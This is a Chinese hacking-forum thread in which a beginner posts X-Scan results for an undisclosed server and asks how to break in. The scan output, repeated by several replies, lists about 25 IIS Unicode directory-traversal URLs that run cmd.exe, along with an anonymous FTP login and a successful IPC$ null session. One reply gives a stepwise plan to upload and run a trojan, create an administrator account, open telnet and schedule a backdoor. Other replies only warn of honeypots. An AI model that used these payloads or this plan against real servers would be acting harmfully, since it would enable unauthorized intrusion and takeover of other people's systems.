论坛: 菜鸟乐园 标题: 这个应该怎么样下手,我是用X-Scan-v2.3-cn扫描的! 复制本贴地址    
作者: 梦幻使者 [xzyt]    论坛用户   登录
 正在检测"开放端口" ...
端口21开放: FTP (Control)
 端口80开放: HTTP, World Wide Web
 端口24开放: Private mail-system
 端口135开放: Location Service
 端口139开放: NETBIOS Session Service
"开放端口"扫描完成, 发现 5.
 正在检测"Snmp口令" ...
 "Snmp口令"扫描完成.
 正在检测"SSL漏洞" ...

"SSL漏洞"扫描完成.
 正在检测"RPC漏洞" ...

"RPC漏洞"扫描完成.
 正在检测"SQL-Server弱口令" ...

 "SQL-Server弱口令"扫描完成.
 正在检测"FTP弱口令" ...
 发现 FTP弱口令: anonymous/[空口令]
 "FTP弱口令"扫描完成, 发现 1.
正在检测"NT-Server弱口令" ...
"NT-Server弱口令"扫描完成.
 正在检测"NetBios信息" ...
 建立IPC$空会话成功
 获取Netbios信息"服务器信息"完成
 获取Netbios信息"网络共享资源列表"完成
 获取Netbios信息"远程注册表信息"完成
 IPC$会话已结束
 发现 "NetBios信息".
正在检测"SMTP漏洞" ...
 "SMTP漏洞"扫描完成.
 正在检测"POP3弱口令" ...
 "POP3弱口令"扫描完成.
 正在检测"CGI漏洞" ...
正在检测"HTTP重定向错误页面" ...
 正在检测"CGI漏洞" ...
发现 CGI漏洞: /iisadmin/
 发现 CGI漏洞: /scripts/tools/dsnform.exe
 发现 CGI漏洞: /scripts/tools/getdrvrs.exe
 发现 CGI漏洞: /scripts/tools/mkilog.exe
 发现 CGI漏洞: /msadc/msadcs.dll
 发现 CGI漏洞: /scripts/tools/newdsn.exe
 "CGI漏洞"扫描完成, 发现 6.
 正在检测"IIS漏洞" ...
 正在检测"HTTP重定向错误页面" ...
 正在检测"IIS漏洞" ...
 发现 IIS漏洞: /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\
 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
]: "IIS漏洞"扫描完成, 发现 25.
扫描全部完成.


地主 发表时间: 03/06 13:26

回复: 无铭 [playopy]   论坛用户   登录
什么IP啊
端口21开放: FTP (Control)
 端口80开放: HTTP, World Wide Web
 端口24开放: Private mail-system
 端口135开放: Location Service
 端口139开放: NETBIOS Session Service
这么多漏洞啊 
发现 CGI漏洞: /iisadmin/
 发现 CGI漏洞: /scripts/tools/dsnform.exe
 发现 CGI漏洞: /scripts/tools/getdrvrs.exe
 发现 CGI漏洞: /scripts/tools/mkilog.exe
 发现 CGI漏洞: /msadc/msadcs.dll
 发现 CGI漏洞: /scripts/tools/newdsn.exe
 "CGI漏洞"扫描完成, 发现 6.
 正在检测"IIS漏洞" ...
 正在检测"HTTP重定向错误页面" ...
 正在检测"IIS漏洞" ...
 发现 IIS漏洞: /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\
 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
这些应该可以啊



B1层 发表时间: 03/06 13:52

回复: ypy [ypy]   见习版主   登录
最简单最有效的Unicode漏洞

B2层 发表时间: 03/06 14:34

回复: ypy [ypy]   见习版主   登录
网上相关教程不要太多

B3层 发表时间: 03/06 14:34

回复: 梦幻使者 [xzyt]   论坛用户   登录
不公开IP

B4层 发表时间: 03/06 17:53

回复: 梦幻使者 [xzyt]   论坛用户   登录
Unicode漏洞,怎么样使用

B5层 发表时间: 03/06 17:54

回复: 小笨猪 [foreverzc]   论坛用户   登录
并不好、只是提供一个权限很低的Shell,如果你能把木马传上去就完事,或者写个提升权限的程序,传上用shell运行

B6层 发表时间: 03/06 19:53

回复: 凳子腿 [dengzitui]   论坛用户   登录
最好不是一个“密罐”

B7层 发表时间: 03/06 19:56

回复: 梦幻使者 [xzyt]   论坛用户   登录
什么?

B8层 发表时间: 03/07 16:21

回复: 摇摆猪 [studio]   论坛用户   登录
给我ip
我就告诉你

B9层 发表时间: 03/07 16:44

回复: 凳子腿 [dengzitui]   论坛用户   登录
如果对方在诱捕黑客你轻易上去……呵呵!会倒大霉的。同志们小心为妙呀

B10层 发表时间: 03/07 17:09

回复: 狒狒 [baboo]   论坛用户   登录
建立IPC$空会话成功
呵呵,还有unicode,想怎么就怎么啊
 

B11层 发表时间: 03/07 18:25

回复: 风雪 [hl82]   论坛用户   登录
unicode  很少见了!

B12层 发表时间: 03/07 18:34

回复: 风雪 [hl82]   论坛用户   登录
unicode  很少见了!

B13层 发表时间: 03/07 18:35

回复: vishx [vishx]   论坛用户   登录
发现 IIS漏洞: /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\
 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
还有FTP弱口领

B14层 发表时间: 03/08 10:53

回复: vishx [vishx]   论坛用户   登录
用unicode能改其组页

B15层 发表时间: 03/08 10:54

回复: 没事就喝 [lodobo]   论坛用户   登录
你说的那个IP很有可能是诱捕黑客的。你真的要小心了。其实有很多可以利用的。。
    1.即然他的139开着。而且空会话成功了。你的机器也是2000的话。那
你就用net命令联上。然后传一个木马上去。再用他的iis漏洞去运行那个木马。你就ok了。
    2.做一个批处理文件。内容是建一个超级用户。然后也用iis去运行这个文件。成功后。用telnethack去打开一个端口。然后telnet上去就可以了。
或者得到权限后,联上给他传一个后门程序用at命令给他启动。用20cn的傻瓜扫描器或者流光的种植者都可以他启动。都可以的。

    拙见一二,大家见笑。有错之处还请指出。谢谢

B16层 发表时间: 03/08 16:33

回复: 梦幻使者 [xzyt]   论坛用户   登录
可是我的是win98的

B17层 发表时间: 03/08 19:05

回复: 骗人的傻瓜 [sol13]   论坛用户   登录
兄弟,你是网管吗?
我是骗人的傻瓜,给我IP啊~~~~~~~~~~~~~~`

B18层 发表时间: 03/08 20:17

回复: laievf [laievf]   论坛用户   登录
呵呵,我想………………Unicode可以做任何事,还可以开3389呵呵

B19层 发表时间: 03/09 07:33

回复: neares [near]   论坛用户   登录
看不懂!!

B20层 发表时间: 03/09 10:41

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号